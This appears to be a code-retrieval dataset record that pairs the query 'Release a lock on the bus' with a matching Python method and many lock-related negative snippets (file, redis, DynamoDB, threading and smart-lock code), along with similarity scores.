async_lock_async(self, device_id, hyper_bridge):\n return await self._async_call_api_op_requires_bridge(\n device_id,\n self._api.async_lock_async,\n self._august_gateway.access_token,\n device_id,\n hyper_bridge,\n )", "def locked(self):\n\t\treturn self.__locked", "def set_lock(self, value):\n act = LockAction(self, value)\n return 
act.invoke()", "async def test_lock(hass, config_entry, zha_gateway):\n from zigpy.zcl.clusters.closures import DoorLock\n from zigpy.zcl.clusters.general import Basic\n\n # create zigpy device\n zigpy_device = await async_init_zigpy_device(\n hass, [DoorLock.cluster_id, Basic.cluster_id], [], None, zha_gateway)\n\n # load up lock domain\n await hass.config_entries.async_forward_entry_setup(\n config_entry, DOMAIN)\n await hass.async_block_till_done()\n\n cluster = zigpy_device.endpoints.get(1).door_lock\n entity_id = make_entity_id(DOMAIN, zigpy_device, cluster)\n zha_device = zha_gateway.get_device(zigpy_device.ieee)\n\n # test that the lock was created and that it is unavailable\n assert hass.states.get(entity_id).state == STATE_UNAVAILABLE\n\n # allow traffic to flow through the gateway and device\n await async_enable_traffic(hass, zha_gateway, [zha_device])\n\n # test that the state has changed from unavailable to unlocked\n assert hass.states.get(entity_id).state == STATE_UNLOCKED\n\n # set state to locked\n attr = make_attribute(0, 1)\n cluster.handle_message(False, 1, 0x0a, [[attr]])\n await hass.async_block_till_done()\n assert hass.states.get(entity_id).state == STATE_LOCKED\n\n # set state to unlocked\n attr.value.value = 2\n cluster.handle_message(False, 0, 0x0a, [[attr]])\n await hass.async_block_till_done()\n assert hass.states.get(entity_id).state == STATE_UNLOCKED\n\n # lock from HA\n await async_lock(hass, cluster, entity_id)\n\n # unlock from HA\n await async_unlock(hass, cluster, entity_id)", "def get(self, block=True, timeout=None):\n return self.queue.get(block, timeout)", "def acquire_shared_lock(f):\n return _fcntl_with_exception_handling(f, exclusive=False)", "def test_lock_blocks():\r\n with throttle_client(b\"[semaphores]\\nA=1\") as client:\r\n first = client.new_peer(expires_in=timedelta(minutes=1))\r\n second = client.new_peer(expires_in=timedelta(minutes=1))\r\n # Acquire first lock\r\n client.acquire(first, \"A\")\r\n\r\n acquired = False\r\n\r\n def wait_for_second_lock():\r\n nonlocal acquired\r\n acquired = client.acquire(\r\n second, semaphore=\"A\", block_for=timedelta(seconds=2)\r\n )\r\n\r\n t = Thread(target=wait_for_second_lock)\r\n t.start()\r\n client.release(first)\r\n t.join()\r\n # Second lock is no longer pending, because we released first and t is finished\r\n assert acquired", "def lock(self, nick, channel, resourcestr):\n return (channel, self._lock(nick, nick, resourcestr))", "def acquire_lock(self):\n if self.lock:\n self.lock.acquire()", "def locked(self):\n return self.__lock.locked()", "def lock(self, database_name):\n return isempty(self._send_command(database_name, \"lock\"))", "def get_bus(self):\n return self._bus", "def get_device(self, device_id: str) -> Doorbell | Lock | None:\n return self._locks_by_id.get(device_id) or self._doorbells_by_id.get(device_id)", "def acquire(self, blocking=True, timeout=None):\n # pylint:disable=too-many-return-statements,too-many-branches\n # Sadly, the body of this method is rather complicated.\n if self._multithreaded is _UNSET:\n self._multithreaded = self._get_thread_ident()\n elif self._multithreaded != self._get_thread_ident():\n self._multithreaded = _MULTI\n\n # We conceptually now belong to the hub of the thread that\n # called this, whether or not we have to block. Note that we\n # cannot force it to be created yet, because Semaphore is used\n # by importlib.ModuleLock which is used when importing the hub\n # itself! 
This also checks for cross-thread issues.\n invalid_thread_use = None\n try:\n self._capture_hub(False)\n except InvalidThreadUseError as e:\n # My hub belongs to some other thread. We didn't release the GIL/object lock\n # by raising the exception, so we know this is still true.\n invalid_thread_use = e.args\n e = None\n if not self.counter and blocking:\n # We would need to block. So coordinate with the main hub.\n return self.__acquire_from_other_thread(invalid_thread_use, blocking, timeout)\n\n if self.counter > 0:\n self.counter -= 1\n return True\n\n if not blocking:\n return False\n\n if self._multithreaded is not _MULTI and self.hub is None: # pylint:disable=access-member-before-definition\n self.hub = get_hub() # pylint:disable=attribute-defined-outside-init\n\n if self.hub is None and not invalid_thread_use:\n # Someone else is holding us. There's not a hub here,\n # nor is there a hub in that thread. We'll need to use regular locks.\n # This will be unfair to yet a third thread that tries to use us with greenlets.\n return self.__acquire_from_other_thread(\n (None, None, self._getcurrent(), \"NoHubs\"),\n blocking,\n timeout\n )\n\n # self._wait may drop both the GIL and the _lock_lock.\n # By the time we regain control, both have been reacquired.\n try:\n success = self._wait(timeout)\n except LoopExit as ex:\n args = ex.args\n ex = None\n if self.counter:\n success = True\n else:\n # Avoid using ex.hub property to keep holding the GIL\n if len(args) == 3 and args[1].main_hub:\n # The main hub, meaning the main thread. We probably can do nothing with this.\n raise\n return self.__acquire_from_other_thread(\n (self.hub, get_hub_if_exists(), self._getcurrent(), \"LoopExit\"),\n blocking,\n timeout)\n\n if not success:\n assert timeout is not None\n # Our timer expired.\n return False\n\n # Neither our timer or another one expired, so we blocked until\n # awoke. Therefore, the counter is ours\n assert self.counter > 0, (self.counter, blocking, timeout, success,)\n self.counter -= 1\n return True", "def locked(self):\n return self._locked", "def locked(self):\n return self._locked", "def locked(self):\n return self._locked" ]
[ "0.7457342", "0.7200968", "0.7150414", "0.71146137", "0.6958682", "0.6892568", "0.6885043", "0.6851491", "0.67310303", "0.6696432", "0.66290563", "0.66086996", "0.6608197", "0.66038275", "0.65713847", "0.6433796", "0.6428536", "0.6421543", "0.6370052", "0.63416463", "0.6332135", "0.63242763", "0.63234043", "0.6322086", "0.63195527", "0.6297683", "0.6271662", "0.6257416", "0.62548244", "0.62357706", "0.6226788", "0.62252957", "0.62166804", "0.61986", "0.61889637", "0.6185496", "0.6185301", "0.61668617", "0.6155541", "0.61123437", "0.6079252", "0.60712993", "0.60600823", "0.6023554", "0.59678966", "0.5959646", "0.59514785", "0.5946145", "0.59320986", "0.592095", "0.5879356", "0.58765846", "0.5842161", "0.5840482", "0.5839942", "0.5824486", "0.58041507", "0.58024406", "0.5781267", "0.57792675", "0.5759739", "0.57574075", "0.57538223", "0.5744118", "0.57359177", "0.57297164", "0.5729373", "0.5706011", "0.5703791", "0.5693733", "0.56894565", "0.5676893", "0.5663076", "0.56613326", "0.5658766", "0.5651597", "0.56495416", "0.5645021", "0.5644718", "0.5635979", "0.56324905", "0.5629047", "0.5617995", "0.56080085", "0.5606681", "0.56008357", "0.55962557", "0.55960906", "0.5571993", "0.5557361", "0.55263704", "0.5524007", "0.5523206", "0.55158764", "0.5503025", "0.55019987", "0.54954123", "0.54884344", "0.54884344", "0.54884344" ]
0.569449
69
Release a lock on the bus
def bus_release(self): self._bus_lock.release()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def release_lock():\r\n get_lock.n_lock -= 1\r\n assert get_lock.n_lock >= 0\r\n # Only really release lock once all lock requests have ended.\r\n if get_lock.lock_is_enabled and get_lock.n_lock == 0:\r\n get_lock.start_time = None\r\n get_lock.unlocker.unlock()", "def release_lock(self):\n if self.lock:\n self.lock.release()", "def release_lock(self):\n self._multistore._unlock()", "def unlock(lock):\n lock.release()", "def release_lock (self):\n\n self.connection.commit ()\n self.locked = False", "def release(self):\n fcntl.flock(self.lock_file, fcntl.LOCK_UN)", "def release(self, o):\n if not self.available(o):\n raise ValueError('you do not own this lock')\n self._owner = None", "def release(self, bay_uuid):\n # Only the conductor that owns the lock will be releasing it.\n result = objects.BayLock.release(bay_uuid, self.conductor_id)\n if result is True:\n LOG.warn(_LW(\"Lock was already released on bay %s!\"), bay_uuid)\n else:\n LOG.debug(\"Conductor %(conductor)s released lock on bay \"\n \"%(bay)s\" % {'conductor': self.conductor_id,\n 'bay': bay_uuid})", "def _release(self):\n try:\n os.unlink(self.lockfile)\n\n # Log success.\n logging.info(\"Released lock at \" + self.lockfile + \"...\")\n except:\n # Ignore all errors.\n pass", "def release_lock():\n lock_file = get_lock_file()\n if exists(lock_file):\n LOG.info('Removing lock file %r' % lock_file)\n os.unlink(lock_file)\n else:\n LOG.warning('Lock file %r did not exist.' % lock_file)", "def release(self):\r\n if self.is_locked:\r\n os.close(self.fd)\r\n os.unlink(self.lockfile)\r\n self.is_locked = False", "def release(self):\n self.is_locked = False\n os.unlink(self.lockfile)", "def release(self):\n if self.is_locked:\n os.close(self.fd)\n os.unlink(self.lockfile)\n self.is_locked = False", "def ReleaseLock(self, lock_data=None):\n if self._acquired_lock is not None:\n if lock_data is not None:\n lock_data = LockData(lock_data)\n\n self._acquired_lock.expire_time = datetime.datetime.min # Force expire.\n self._acquired_lock.lock_data = lock_data\n self._acquired_lock.put()\n else:\n self._acquired_lock.delete()", "def __del__(self):\n if self.is_locked:\n self.release()", "def unlock (self):\n fcntl.flock(self._lockHandle, fcntl.LOCK_UN)\n self._lockHandle.close()", "def unlock(self):\n\n\t\t# Release the file lock first\n\t\tfcntl.lockf(self.lockfile, fcntl.LOCK_UN)\n\t\t# Release the thread lock\n\t\tself.s.release()", "def write_release(self):\n self.is_locked = False\n self.rwlock = RWLock().write_release()", "def unlock(self):\n self.mtx.release()", "def release_node(self, node):\n # use the lua script to release the lock in a safe way\n try:\n node._release_script(keys=[self.resource], args=[self.lock_key])\n except (redis.exceptions.ConnectionError, redis.exceptions.TimeoutError):\n pass", "def _release_imp(self):\n\n self._logger.debug(\n 'Release Lock', lock_name=self._lock_name, caler=self._holder)\n\n try:\n self._dynamodb_wrapper.put_item(\n self._table_name,\n {\n mutex_consts.MutexDynamoConfig.lock.value: self._lock_name,\n mutex_consts.MutexDynamoConfig.holder.value: mutex_consts.NO_HOLDER_DATA,\n mutex_consts.MutexDynamoConfig.ttl.value: 0,\n },\n dynamodb_condition.Condition.is_equal(mutex_consts.MutexDynamoConfig.holder.value, mutex_consts.NO_HOLDER_DATA) |\n dynamodb_condition.Condition.is_equal(mutex_consts.MutexDynamoConfig.holder.value, self._holder) |\n dynamodb_condition.Condition.not_exists(mutex_consts.MutexDynamoConfig.lock.value))\n\n except (dynamodb_exceptions.PutItemConditionException, 
dynamodb_exceptions.PutItemException):\n self._logger.log_and_raise(\n mutex_exceptions.MutexReleaseFailedException, self._lock_name, self._holder, str(self._ttl))", "def release(self):\n self.filelock.set()\n self.locked = False\n self.exclusive = False", "def release(self):\n self.filelock.set()\n self.locked = False\n self.exclusive = False", "def un_lock(self):\n self._un_lock()", "def api_release(self):\n\n self._api_release_lock_with_timer()", "def _release_lock(self, job_info):\n os.remove(self.lock_file)\n self.logger.debug(\"lock release for '%s'\" % job_info)", "def release_lock(self, lockname, identifier):\n conn = self.conn\n pipe = conn.pipeline(True)\n lockname = \"lock:\" + lockname\n\n while True:\n try:\n pipe.watch(lockname)\n cur_id = pipe.get(lockname)\n if cur_id and cur_id.decode(\"utf-8\") == identifier:\n pipe.multi()\n pipe.delete(lockname)\n pipe.execute()\n return True\n\n pipe.unwatch()\n break\n\n except self.__redis_mod.exceptions.WatchError:\n pass\n\n return False", "def release_lock(self):\n senlin_lock.node_lock_release(self.entity.id, self.id)\n\n # only release cluster lock if it was locked as part of this\n # action (i.e. it's a user intiated action aka CAUSE_RPC from\n # senlin API and a not a CAUSED_DERIVED)\n if self.cause == consts.CAUSE_RPC:\n senlin_lock.cluster_lock_release(self.entity.cluster_id, self.id,\n senlin_lock.NODE_SCOPE)\n return self.RES_OK", "def release_named_lock(self, name):\r\n self.log.debug(\"Releasing named lock (%s)\" % name)\r\n self._named_locks[name].release()", "def unlock_clock(self):\n self.sem.release()", "def test_unblock_immediatly_after_release():\r\n with throttle_client(b\"[semaphores]\\nA=1\") as client:\r\n one = client.new_peer(expires_in=timedelta(minutes=1))\r\n two = client.new_peer(expires_in=timedelta(minutes=1))\r\n # Acquire first lease\r\n client.acquire(one, \"A\")\r\n\r\n # Wait for `two` in a seperate thread so we can use this thread to release `one`\r\n def wait_for_two():\r\n client.acquire(two, \"A\", block_for=timedelta(seconds=15))\r\n\r\n t = Thread(target=wait_for_two)\r\n t.start()\r\n\r\n # Unblock `t`\r\n client.release(one)\r\n\r\n # Three seconds should be ample time for `t` to return\r\n t.join(3)\r\n # If `t` is alive, the join timed out, which should not be the case\r\n assert not t.is_alive()", "def release_lock(fl):\n try:\n fcntl.lockf(fl, fcntl.LOCK_UN)\n except IOError as e:\n sys.exit(3)", "def release(self):\n self.acquired = False", "def release(lockfile):\n\t# Must be called _only_ if the lockfile was successfully obtained\n\tos.unlink(lockfile)", "def release(self) -> None:\n if not self.__monitor.acquire(timeout=self.__timeout):\n raise PetroniaLockTimeoutError()\n if self.__rwlock < 0:\n self.__rwlock = 0\n else:\n self.__rwlock -= 1\n wake_writers = self.__writers_waiting and self.__rwlock == 0\n wake_readers = self.__writers_waiting == 0\n self.__monitor.release()\n if wake_writers:\n self.__writers_ok.acquire()\n self.__writers_ok.notify()\n self.__writers_ok.release()\n elif wake_readers:\n self.__readers_ok.acquire()\n self.__readers_ok.notifyAll()\n self.__readers_ok.release()", "def _api_release_lock_with_timer(self):\n\n if self._apt_timer.is_alive():\n self._apt_timer.cancel()\n\n if self._api_lock.locked():\n self._api_lock.release()", "def unlock(self):\n raise NotImplementedError", "def _unlock(self):\n if self.is_locked():\n self._unlink(self.lockfile)\n self._remove_unique_file()\n self._p(\"Lock removed.\")\n else:\n self._remove_unique_file()", "def 
release(self):\n try:\n if self.stream_lock and not self.stream_lock.closed:\n unlock(self.stream_lock)\n except Exception:\n pass\n finally:\n BaseRotatingHandler.release(self)", "def release_lock(self):\r\n if self._lock.is_unlocked():\r\n return False\r\n else:\r\n self._lock.release()\r\n self._lock = Lock.unlocked()\r\n return True", "def unlock(self):\n\n self.wait = False", "def release_flock(lockfd):\n if lockfd:\n fcntl.flock(lockfd, fcntl.LOCK_UN)", "def unlock(*args):", "def release(self):\n if not self.is_locked():\n error = NotLocked()\n raise error\n if not self.i_am_locking():\n error = NotMyLock()\n raise error\n remove_existing_pidfile(self.path)", "def netmiko_release(self):\n\n self._netmiko_lock.release()", "def _unlock(self):\n self._lockFile.close()\n os.unlink(self._lockFilename)", "def release(self):\n #关闭文件,删除文件\n if self.fd is not None:\n os.close(self.fd)\n os.unlink(self.lockfile)\n self.is_locked = False\n self.fd = None", "def unlock(self):\n assert self._pa_threaded_mainloop is not None\n # TODO: This is not completely safe. Unlock might be called without lock.\n assert self._lock_count > 0\n self._lock_count -= 1\n pa.pa_threaded_mainloop_unlock(self._pa_threaded_mainloop)", "def _unlock(self):\n self._file.unlock_and_close()\n self._thread_lock.release()", "def __exit__(self, type, value, traceback):\r\n if self.is_locked:\r\n self.release()", "def f_unlock(self):\n self._locked = False", "def _unlock(self, fd):\n fcntl.lockf(fd, fcntl.LOCK_UN)", "def unlock(self) -> None:\n self.__logger.debug('Eva.unlock called')\n return self.__http_client.lock_unlock()", "def release_ticket(self, wid, project):\n\n path = os.path.join(self.prjdir, project)\n q = WorkQueue(path)\n\n head_wi = Workitem(q.head())\n if head_wi.wfid != wid.wfid:\n self.log.info(\"OUCH ... 
released the wrong lock\")\n\n try:\n next_wid = Workitem(q.next())\n next_wid.result = True\n # Implementation is a bit convoluted but this just sends\n # the WI from the stack to BOSS\n self.send_to_engine(next_wid)\n except QueueEmpty:\n # That's OK, there's nothing waiting\n pass\n wid.result = True", "def unlock(self):\n print(\"DEPRECATED unlock\")\n return self._operations.unlock()", "async def release(self) -> None:\n ...", "async def release(self) -> None:\n ...", "async def release(self) -> None:\n ...", "def demote(self) -> None:\n if not self.__monitor.acquire(timeout=self.__timeout):\n raise PetroniaLockTimeoutError()\n self.__rwlock = 1\n self.__readers_ok.notifyAll()\n self.__monitor.release()", "def read_release(self):\n self.is_locked = False\n self.rwlock = RWLock().read_acquire()", "def _release_listgen_lock(self):\n with self._conn as conn, conn.cursor() as cursor:\n cursor.execute('SELECT pg_advisory_unlock(%s::BIGINT)', [self._lock_key])", "def release(self, exc_type=None, exc_value=None, traceback=None):\n try:\n self.__lock.release()\n except _thread.error:\n if self.__verbose:\n raise", "def release_lock(uuid, lock_uuid, db, c):\n try:\n execute_with_retry(db, c, \"DELETE FROM locks WHERE uuid = %s AND lock_uuid = %s\", (uuid, lock_uuid,))\n db.commit()\n if c.rowcount == 1:\n logging.debug(\"released lock on {}\".format(uuid))\n else:\n logging.warning(\"failed to release lock on {} with lock uuid {}\".format(uuid, lock_uuid))\n\n return c.rowcount == 1\n except Exception as e:\n logging.error(\"unable to release lock {}: {}\".format(uuid, e))\n report_exception()\n\n return False", "def release_play_lock(self) :\n self.play_lock = False", "def release(self):\r\n\r\n if self._lock_fd:\r\n unlock_file(self._lock_fd, close=True)\r\n self._lock_fd = None\r\n return True\r\n else:\r\n return False", "def __exit__(self, type_, value, traceback):\n if self.is_locked:\n self.release()", "async def async_unlock_async(self, device_id, hyper_bridge):\n return await self._async_call_api_op_requires_bridge(\n device_id,\n self._api.async_unlock_async,\n self._august_gateway.access_token,\n device_id,\n hyper_bridge,\n )", "def _release_locks(self):\n self._acquire_event.clear()\n for lock in self._locks[:]:\n try:\n lock.release()\n except KazooException: # pragma: nocover\n # We proceed to remove as many as possible, and leave\n # the ones we couldn't remove\n pass\n else:\n self._locks.remove(lock)", "def unlock(self, nReserved):\n\t\treturn Job(SDK.PrlVm_Unlock(self.handle, nReserved)[0])", "async def async_unlock(self, **kwargs: Any) -> None:\n if not await self._node.secure_unlock():\n raise HomeAssistantError(f\"Unable to unlock device {self._node.address}\")", "def release_event_lock(self) -> bool:\n self.cancel_pending(\"event-lock\")\n self.set_pending(\n \"event-lock\",\n self.do_release_event_lock,\n self.event_lock_delay\n )\n return True", "def release(self) -> DeprecatedAwaitable:\n self._lock.release()\n return DeprecatedAwaitable(self.release)", "def test_remove_lock_unlocked(self):\n try:\n dweepy.remove_lock(test_lock, test_key)\n except dweepy.DweepyError as e:\n self.assertEqual(e.args[0], 'this lock is not in use')", "def do_release_event_lock(self) -> bool:\n self._EventLock = False\n return True", "def unlock(self):\n self.mainloop().unlock()", "def unlock(self, password):\n if self.locked:\n self._privkey = keys.decode_keystore_json(self.keystore, password)\n self.locked = False\n self.address # get address such that it stays accessible after a 
subsequent lock", "def _release_lock(self, key: Hashable, entry: _LinearizerEntry) -> None:\n logger.debug(\"Releasing linearizer lock %r for key %r\", self.name, key)\n\n # We've finished executing so check if there are any things\n # blocked waiting to execute and start one of them\n entry.count -= 1\n\n if entry.deferreds:\n (next_def, _) = entry.deferreds.popitem(last=False)\n\n # we need to run the next thing in the sentinel context.\n with PreserveLoggingContext():\n next_def.callback(None)\n elif entry.count == 0:\n # We were the last thing for this key: remove it from the\n # map.\n del self.key_to_defer[key]", "def _unlock(self):\n from os import remove\n remove(self.db_path + \".lock\")", "def force_unlock():\r\n global timeout_before_override\r\n timeout_backup = timeout_before_override\r\n timeout_before_override = 0\r\n try:\r\n get_lock(min_wait=0, max_wait=0.001)\r\n release_lock()\r\n finally:\r\n timeout_before_override = timeout_backup", "def delete_lock(self, lock_name):\n path = '/locks/delete/%s' % lock_name\n response = self.rest.request(content_type='text/plain',\n method='delete', path=path)\n return response.ok", "def test_lock_unlock(self):\n my_thing_id = str(uuid.uuid4())\n dweepy.lock(my_thing_id, test_lock, test_key)\n dweepy.unlock(my_thing_id, test_key)", "def release():\n lockfile = path.user('.%s.lock' % application.NAME)\n if isfile(lockfile):\n unlink(lockfile)\n return True\n return False", "def __del__(self):\n\n if self._needs_release:\n send_message(self, \"release\", restype=objc_id, argtypes=[])", "def lock(self):\n self._privkey = None\n self.locked = True", "def release(self):\n if self._tr is not None:\n self._tr.release()", "def lock_stop(self):\n if self.lock_running:\n # print(\"lock_end -> start\")\n self.lock_thread__stop_event.set()\n self.lock_thread.join()\n self.lock_running = False\n\n self.lock_obj.timestamp = self.lock_obj.timestamp - OriginLock.lock_timeout\n self.lock_obj.save()\n # print(\"thread.join()\")", "def freelock(self, nick, channel, resourcestr):\n resources, multi = self.getlocks(resourcestr)\n # iterate over all resources once to check for errors\n for r in resources:\n if not self.locks[r].owner:\n raise LockBotException('ERROR: resource %s is already unlocked' % r,\n resourcestr, self.verb)\n\n # all clear, perform freelock\n msgs = [(channel,\n \"%s: RELEASED, resource%s %s %s free\" %\n (nick,\n 's' if multi else '',\n ', '.join(resources),\n 'are' if multi else 'is',\n ))]\n\n for r in resources:\n l = self.locks[r]\n lockowner = l.owner\n l.owner = ''\n msgs += [(channel,\n \"%s: your lock on %s has been released by %s\" %\n (lockowner, r, nick))]\n assignee = l.popwaiter()\n if assignee:\n msgs += [(channel, self._lock(nick, assignee, r))]\n\n return msgs", "def unlock(self):\n assert self._locked\n\n for interface in (self._if_data, self._if_comm):\n num = interface.bInterfaceNumber\n usb.util.release_interface(self._dev, num)\n try:\n self._dev.attach_kernel_driver(num)\n except NotImplementedError:\n pass\n except usb.core.USBError:\n pass\n self._locked = False", "def unlock(self, tag, index, cas):\n return True", "def unfreeze(self,):\n if self.frozen and self.id_lock.locked():\n self.id_lock.release()\n self.loglocker.release()\n self.frozen = False", "def unlock(self, item_type):", "def release(self, connection):\n with self.lock:\n connection.in_use = False\n self.cond.notify_all()", "def processUnlock(self):\r\n self.controller.executionUnlock()", "def cleanup(self):\r\n # XXX should be fixed 
properly!!!\r\n try:\r\n self.unlock()\r\n except:\r\n pass", "def test_remove_lock_locked(self):\n my_thing_id = str(uuid.uuid4())\n dweepy.lock(my_thing_id, test_lock, test_key)\n self.assertEqual(dweepy.remove_lock(test_lock, test_key), test_lock)", "def purge(self):\n while self.bus.inWaiting() > 0:\n self.bus.read(self.bus.inWaiting())", "def unlock(self, unconditionally=False):\n islocked = self.locked()\n if not islocked and not unconditionally:\n raise NotLockedError\n # If we owned the lock, remove the global file, relinquishing it.\n if islocked:\n try:\n os.unlink(self.__lockfile)\n except OSError, e:\n if e.errno <> errno.ENOENT: raise\n # Remove our tempfile\n try:\n os.unlink(self.__tmpfname)\n except OSError, e:\n if e.errno <> errno.ENOENT: raise", "def _release_subtask_lock(task_id):\r\n # According to Celery task cookbook, \"Memcache delete is very slow, but we have\r\n # to use it to take advantage of using add() for atomic locking.\"\r\n key = \"subtask-{}\".format(task_id)\r\n cache.delete(key)", "def unlocked():\r\n return Lock(None)", "def unlock(fd):\n fcntl.lockf(fd, fcntl.LOCK_UN)\n os.close(fd)" ]
[ "0.7924762", "0.7834396", "0.77969474", "0.77904904", "0.74435604", "0.74268526", "0.73679256", "0.7322436", "0.7123128", "0.7118452", "0.71132535", "0.709967", "0.7089947", "0.70288163", "0.7005624", "0.699237", "0.6928809", "0.6910996", "0.6896251", "0.687286", "0.6866911", "0.68550605", "0.68550605", "0.68473834", "0.68452495", "0.6841358", "0.680688", "0.6780136", "0.67540735", "0.67366713", "0.6666398", "0.6655856", "0.6655782", "0.66313845", "0.66064906", "0.65943927", "0.65206957", "0.64731157", "0.64648455", "0.64635146", "0.6462833", "0.6457605", "0.6444689", "0.6438286", "0.64284575", "0.63600004", "0.6326293", "0.6296386", "0.6247347", "0.6236592", "0.620765", "0.6198268", "0.6198256", "0.61879337", "0.6177789", "0.6177462", "0.6177462", "0.6177462", "0.6170981", "0.61652935", "0.61620617", "0.61590546", "0.61140126", "0.6093962", "0.6066924", "0.6045754", "0.6022716", "0.6017603", "0.60098296", "0.6009101", "0.59990793", "0.59944475", "0.59919226", "0.59729135", "0.5960233", "0.5936036", "0.59347486", "0.5856131", "0.5852433", "0.58360857", "0.58233374", "0.58008486", "0.5796706", "0.57867676", "0.57655007", "0.5740402", "0.5734545", "0.5731939", "0.5723791", "0.5716259", "0.56916606", "0.5679157", "0.56678206", "0.562634", "0.5625524", "0.5610949", "0.5609698", "0.56080246", "0.56078565", "0.56043065" ]
0.8140664
0
Get status of the lock
def bus_locked(self): return self._bus_lock.locked()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def lock_status(self) -> Dict[str, str]:\n self.__logger.debug('Eva.lock_status called')\n return self.__http_client.lock_status()", "def getstatus(self):\n with self.lock:\n return (self.status, self.time_start)", "def get_raw_status(self):\n self.__param_lock.acquire()\n status = self.__status\n self.__param_lock.release()\n return status", "def get_lock(self):\n function_string = 'IFLOCK'\n self.scpi_comm(function_string)\n function_string = 'IFLOCK?'\n status = int(self.scpi_comm(function_string))\n return_message = \"\"\n if status == 0:\n return_message = \"Not successful\"\n if status == -1:\n return_message = \"Device already locked\"\n if status == 1:\n return_message = \"Lock acquired\"\n return return_message", "def get_lock(self):\n \n svc = \"urn:micasaverde-com:serviceId:DoorLock1\"\n if not svc in self.services:\n raise RuntimeError, \"Device doesn't support the service\"\n \n status = self.get_variable(svc, \"Status\")\n return status == 1", "def status(self):\n with self.__lock:\n assert(self.__complete)\n return self.__status", "def _check_status(self):\n self.system_status_lock.acquire()\n info = self.system_status_proxy._getvalue()\n self.system_status_lock.release()\n return info", "def locked(self):\n with self._block:\n status = repr(self).split(maxsplit=1)[0][1:]\n assert status in ('locked', 'unlocked')\n return status == 'locked'", "async def get_status():", "def getstatus(self):\n return self.__status", "def get_status(self):\n\t\treturn call_sdk_function('PrlJob_GetStatus', self.handle)", "def _get_status(self):\n return self.__status", "def is_locked(self) -> bool | None:\n if self._node.status is None:\n return None\n return VALUE_TO_STATE.get(self._node.status)", "def get_status(self):\n return self._status", "def GetStatus(self):\r\n return self.status", "def lock(self):\r\n return self._lock", "def status(self):\n self._refresh_state()\n return self._data.get('status')", "def get_status(self):\n return self.status", "def get_status(self):\n return self.status", "def get_status(self):\n return self.status", "def getStatus(self):\n return self.__status", "def status(self):\n\t\treturn self._status", "def lock(self):\n return self._lock", "def get_status(self):\n return self.read_register(259, 0, 3)", "def is_locked(self):\r\n pass", "def get_state(self):\n if not self._variable.get():\n return \"Locked\"\n\n elif self._variable.get():\n return \"Unlocked\"", "def status(self):\r\n return self._status", "def status(self):\r\n return self._status", "def status(self):\n return self.get(self._names[\"status\"])", "def query_lock_status(self):\n fl_vars = self.query('FL_PrintVars')\n #The manual doesn't give enough information to extract the intensity\n # some experimentation required\n intensity = int(fl_vars[0:3]) #??? Can the string be sliced like this,\n # or do we need to cut it at a comma?\n # Intensity is the first value? 
followed by x\n # and y positions\n if intensity < self.int_thresh:\n self.locked = False\n else:\n self.locked = True\n return self.locked", "def get_status(self):\n return self.o.read_register(self.dev_id, STATUS)", "def getStatus(self):\n return self._status", "def locked(self):\n return self.__lock.locked()", "def v_locked(self):\n return self._locked", "def status(self):\n return self.__status", "def status(self):\n return self.__status", "def locked(self):\n\t\treturn self.__locked", "def locked(self):\n return self.is_locked", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def get_status(self):\n return self._refreshed", "def get_status(self):\n # TODO retrieve from db if not set\n return self.status", "def locked(self):\n return self._locked", "def locked(self):\n return self._locked", "def locked(self):\n return self._locked", "def status(self):\n return self.m.status", "def is_locked(self) -> bool:\n return bool(self._node.status)", "def status(self):\n return self.status", "def locked(self):\n return self._filelock.locked", "def status(self):\n if hasattr(self, \"_status\"):\n return self._status\n else:\n return None", "def locked(self):\n return self.partner_state.locked.outstanding", "def is_locked(self):\n return cache.get(self.id)", "def status(self):\n return self.job_proto.status", "def lock(self):\n print(\"DEPRECATED lock\")\n return self._operations.lock()", "def status(self):\n return self._get(path='status')", "def status(self):\n\n return self._status", "def status(self):\n\n return self._status", "def status(self):\n\n return self._status", "def is_locked(self):\n ret_val = self._is_locked()\n return ret_val", "def lock_for_update(self):\n return self.lock(True)", "async def get_status(self) -> str:\n return await self.hw_device.status()", "def svn_info_t_lock_get(svn_info_t_self): # real signature unknown; restored from __doc__\n pass", "def status(self):\n return self.state", "def getStatus():", "def status(self):\n assert(self.__complete)\n return self.__status", "def is_locked(self):\n return self._is_locked", "def status(self):\n return STATUS[self.fields['status']]", "def status(self) -> dict[str, str] | None:\n return self._status", "def check_status(self):\n return self.status", "def check_status(self):\n return self.status", "def getStatus(self, key, time):\n return self.get(\"status\", key, time)", "def status(self):\n return self._dbattr('status')", "def status(self):\n return self._data['status']", "def check_lock_server(self):\n file_locked = True\n while file_locked:\n response = 
requests.get(LOCK_SERVER_ADDR+\"getLockStatus\", {'file_path': self.filename, 'user_id': self.user_id})\n if response.json()['file_locked']:\n file_locked = True\n time.sleep(5)\n else:\n file_locked = False\n return", "def set_lock_status(use_lock):\r\n get_lock.lock_is_enabled = use_lock", "def membership_lock(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"membership_lock\")", "def is_locked(self):\n return bool(int(self._fp(self.F_LOCKED).read()))", "def status(self, nick, channel):\n lockeditems = sorted([item[0] for item in self.locks.items() if item[1].owner])\n if len(lockeditems) == 0:\n return (channel, \"There are no locked resources\")\n else:\n messages = []\n messages += [(channel, \"Status of locked resources:\")]\n for k in lockeditems:\n l = self.locks[k]\n msg = \" resource: %s owner: %s\" % (k, l.owner)\n if l.waiters:\n msg += \" waiters: %s\" % ','.join(l.waiters)\n messages += [(channel, msg)]\n\n return messages", "def status(self):\n return status_dict[self._get_property_(self.STATUS).upper()]" ]
